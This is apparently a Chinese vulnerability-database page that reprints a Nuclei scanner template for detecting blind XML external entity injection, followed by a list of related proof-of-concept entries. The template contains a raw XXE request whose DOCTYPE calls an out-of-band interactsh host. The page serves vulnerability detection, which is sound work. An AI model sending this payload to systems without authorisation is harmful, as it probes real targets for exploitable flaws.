generic-blind-xxe: Generic Blind XXE

漏洞描述

PoC代码[已公开]

id: generic-blind-xxe

info:
  name: Generic Blind XXE
  author: geeknik
  severity: high
  description: This template detects Generic Blind XXE.
  metadata:
    max-request: 1
  tags: xxe,generic,blind,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Referer: {{BaseURL}}

        <?xml version="1.0"?>
        <!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">
        <foo>&e1;</foo>

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4b0a004830460221009c5b86fa43af77cb239443634dd4fd04c2e883c72b181180f7eb47558a832b5c022100c684e3d68b6166a575aa7391d53d4bb174805260936e878a6362cf4e263dfe99:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• POC CVE-2017-17762: Episerver 7 - Blind XML External Entity Injection
• POC generic-php-files: Generic PHP Backup Information Disclosure
• WSO2 API Manager /carbon/generic/save_artifact_ajaxprocessor.jsp XML 外部实体注入漏洞（CVE-2020-24589）
• POC CVE-2024-22120: Zabbix Server - Time-Based Blind SQL injection
• POC CVE-2015-9323: 404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection
• POC CVE-2018-16159: WordPress Gift Voucher <4.1.8 - Blind SQL Injection
• POC CVE-2018-3167: Oracle E-Business Suite - Blind SSRF
• POC CVE-2018-7282: TITool PrintMonitor - Blind SQL Injection
• POC CVE-2019-16932: Visualizer <3.3.1 - Blind Server-Side Request Forgery
• POC CVE-2020-10770: Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)
• POC CVE-2020-11530: WordPress Chop Slider 3 - Blind SQL Injection
• POC CVE-2020-24589: WSO2 API Manager <=3.1.0 - Blind XML External Entity Injection
• POC CVE-2020-28976: WordPress Canto 1.3.0 - Blind Server-Side Request Forgery